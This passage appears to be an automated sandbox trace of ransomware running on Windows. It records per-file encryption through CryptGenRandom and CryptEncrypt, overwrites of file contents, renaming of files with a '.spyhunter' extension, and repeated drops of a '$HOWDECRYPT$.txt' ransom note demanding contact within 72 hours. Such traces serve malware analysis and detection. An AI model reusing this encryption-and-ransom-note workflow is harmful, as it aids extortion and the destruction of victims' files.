0x2c0000 [0092.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.131] GetProcessHeap () returned 0x2c0000 [0092.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330de8 | out: hHeap=0x2c0000) returned 1 [0092.131] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc30 | out: pbBuffer=0x270fc30) returned 1 [0092.131] GetProcessHeap () returned 0x2c0000 [0092.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.131] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc28*=0x30) returned 1 [0092.131] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.132] GetProcessHeap () returned 0x2c0000 [0092.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.132] GetProcessHeap () returned 0x2c0000 [0092.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x351188 | out: hHeap=0x2c0000) returned 1 [0092.132] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc30 | out: pbBuffer=0x270fc30) returned 1 [0092.132] GetProcessHeap () returned 0x2c0000 [0092.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.132] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc28*=0x30) returned 1 [0092.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.132] GetProcessHeap () returned 0x2c0000 [0092.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.133] GetProcessHeap () returned 0x2c0000 [0092.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329e90 | out: hHeap=0x2c0000) returned 1 [0092.133] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc28 | out: pbBuffer=0x270fc28) returned 1 [0092.133] GetProcessHeap () returned 0x2c0000 [0092.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.133] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc20*=0x30) returned 1 [0092.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0092.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\desktop.ini") returned 32 [0092.133] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.133] GetProcessHeap () returned 0x2c0000 [0092.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0092.134] ReadFile (in: hFile=0x170, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fbe4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x270fbe4*=0xae, lpOverlapped=0x0) returned 1 [0092.134] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.134] WriteFile (in: hFile=0x170, lpBuffer=0x347830*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x270fbe4, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x270fbe4*=0xae, lpOverlapped=0x0) returned 1 [0092.135] GetProcessHeap () returned 0x2c0000 [0092.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0092.135] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.135] WriteFile (in: hFile=0x170, lpBuffer=0x270fc24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fbe4, lpOverlapped=0x0 | out: lpBuffer=0x270fc24*, lpNumberOfBytesWritten=0x270fbe4*=0x4, lpOverlapped=0x0) returned 1 [0092.135] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fbe4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270fbe4*=0x30, lpOverlapped=0x0) returned 1 [0092.135] CloseHandle (hObject=0x170) returned 1 [0092.136] GetProcessHeap () returned 0x2c0000 [0092.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0092.136] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\desktop.ini.spyhunter") returned 42 [0092.136] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\desktop.ini.spyhunter" (normalized: "c:\\program files\\desktop.ini.spyhunter")) returned 1 [0092.137] GetProcessHeap () returned 0x2c0000 [0092.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0092.137] GetProcessHeap () returned 0x2c0000 [0092.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.137] GetProcessHeap () returned 0x2c0000 [0092.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e4a8 | out: hHeap=0x2c0000) returned 1 [0092.137] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0092.138] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.138] WriteFile (in: hFile=0x170, lpBuffer=0x270fb5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fc84, lpOverlapped=0x0 | out: lpBuffer=0x270fb5b*, lpNumberOfBytesWritten=0x270fc84*=0x127, lpOverlapped=0x0) returned 1 [0092.139] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.139] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fc84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fc84*=0x2ac, lpOverlapped=0x0) returned 1 [0092.139] CloseHandle (hObject=0x170) returned 1 [0092.140] GetProcessHeap () returned 0x2c0000 [0092.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d160 | out: hHeap=0x2c0000) returned 1 [0092.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0092.140] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.140] WriteFile (in: hFile=0x170, lpBuffer=0x270fb57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fc80, lpOverlapped=0x0 | out: lpBuffer=0x270fb57*, lpNumberOfBytesWritten=0x270fc80*=0x127, lpOverlapped=0x0) returned 1 [0092.141] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.141] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fc80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fc80*=0x2ac, lpOverlapped=0x0) returned 1 [0092.142] CloseHandle (hObject=0x170) returned 1 [0092.142] GetProcessHeap () returned 0x2c0000 [0092.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cd58 | out: hHeap=0x2c0000) returned 1 [0092.142] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc20 | out: pbBuffer=0x270fc20) returned 1 [0092.142] GetProcessHeap () returned 0x2c0000 [0092.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.142] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc18*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc18*=0x30) returned 1 [0092.142] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.142] GetProcessHeap () returned 0x2c0000 [0092.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.142] GetProcessHeap () returned 0x2c0000 [0092.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329f48 | out: hHeap=0x2c0000) returned 1 [0092.142] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc18 | out: pbBuffer=0x270fc18) returned 1 [0092.143] GetProcessHeap () returned 0x2c0000 [0092.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.143] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc10*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc10*=0x30) returned 1 [0092.143] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.143] GetProcessHeap () returned 0x2c0000 [0092.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.143] GetProcessHeap () returned 0x2c0000 [0092.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d000 | out: hHeap=0x2c0000) returned 1 [0092.143] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0092.143] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.143] WriteFile (in: hFile=0x170, lpBuffer=0x270fb4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fc74, lpOverlapped=0x0 | out: lpBuffer=0x270fb4b*, lpNumberOfBytesWritten=0x270fc74*=0x127, lpOverlapped=0x0) returned 1 [0092.144] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.144] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fc74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fc74*=0x2ac, lpOverlapped=0x0) returned 1 [0092.145] CloseHandle (hObject=0x170) returned 1 [0092.145] GetProcessHeap () returned 0x2c0000 [0092.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0092.145] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc10 | out: pbBuffer=0x270fc10) returned 1 [0092.145] GetProcessHeap () returned 0x2c0000 [0092.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc08*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc08*=0x30) returned 1 [0092.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.209] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 60 [0092.209] StrStrW (lpFirst="xmlrwbin.dll", lpSrch=".txt") returned 0x0 [0092.209] GetProcessHeap () returned 0x2c0000 [0092.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c11050 [0092.209] ReadFile (in: hFile=0x178, lpBuffer=0x2c11050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesRead=0x270fbcc*=0x2800, lpOverlapped=0x0) returned 1 [0092.309] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.309] WriteFile (in: hFile=0x178, lpBuffer=0x2c11050*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesWritten=0x270fbcc*=0x2800, lpOverlapped=0x0) returned 1 [0092.309] GetProcessHeap () returned 0x2c0000 [0092.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c11050 | out: hHeap=0x2c0000) returned 1 [0092.310] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.310] WriteFile (in: hFile=0x178, lpBuffer=0x270fc0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fbcc, lpOverlapped=0x0 | out: lpBuffer=0x270fc0c*, lpNumberOfBytesWritten=0x270fbcc*=0x4, lpOverlapped=0x0) returned 1 [0092.322] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fbcc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270fbcc*=0x30, lpOverlapped=0x0) returned 1 [0092.323] CloseHandle (hObject=0x178) returned 1 [0092.379] GetProcessHeap () returned 0x2c0000 [0092.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0092.380] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.spyhunter") returned 70 [0092.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.spyhunter" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll.spyhunter")) returned 1 [0092.381] GetProcessHeap () returned 0x2c0000 [0092.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0092.381] GetProcessHeap () returned 0x2c0000 [0092.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.381] GetProcessHeap () returned 0x2c0000 [0092.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32da68 | out: hHeap=0x2c0000) returned 1 [0092.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.383] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.383] WriteFile (in: hFile=0x178, lpBuffer=0x270fb43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fc6c, lpOverlapped=0x0 | out: lpBuffer=0x270fb43*, lpNumberOfBytesWritten=0x270fc6c*=0x127, lpOverlapped=0x0) returned 1 [0092.384] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.384] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fc6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fc6c*=0x2ac, lpOverlapped=0x0) returned 1 [0092.384] CloseHandle (hObject=0x178) returned 1 [0092.385] GetProcessHeap () returned 0x2c0000 [0092.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0092.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc08 | out: pbBuffer=0x270fc08) returned 1 [0092.385] GetProcessHeap () returned 0x2c0000 [0092.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc00*=0x30) returned 1 [0092.385] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.386] GetProcessHeap () returned 0x2c0000 [0092.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.386] GetProcessHeap () returned 0x2c0000 [0092.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.386] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc08 | out: pbBuffer=0x270fc08) returned 1 [0092.386] GetProcessHeap () returned 0x2c0000 [0092.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.386] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc00*=0x30) returned 1 [0092.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.386] GetProcessHeap () returned 0x2c0000 [0092.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.386] GetProcessHeap () returned 0x2c0000 [0092.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0092.386] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc00 | out: pbBuffer=0x270fc00) returned 1 [0092.387] GetProcessHeap () returned 0x2c0000 [0092.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbf8*=0x30) returned 1 [0092.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.387] GetProcessHeap () returned 0x2c0000 [0092.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.387] GetProcessHeap () returned 0x2c0000 [0092.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 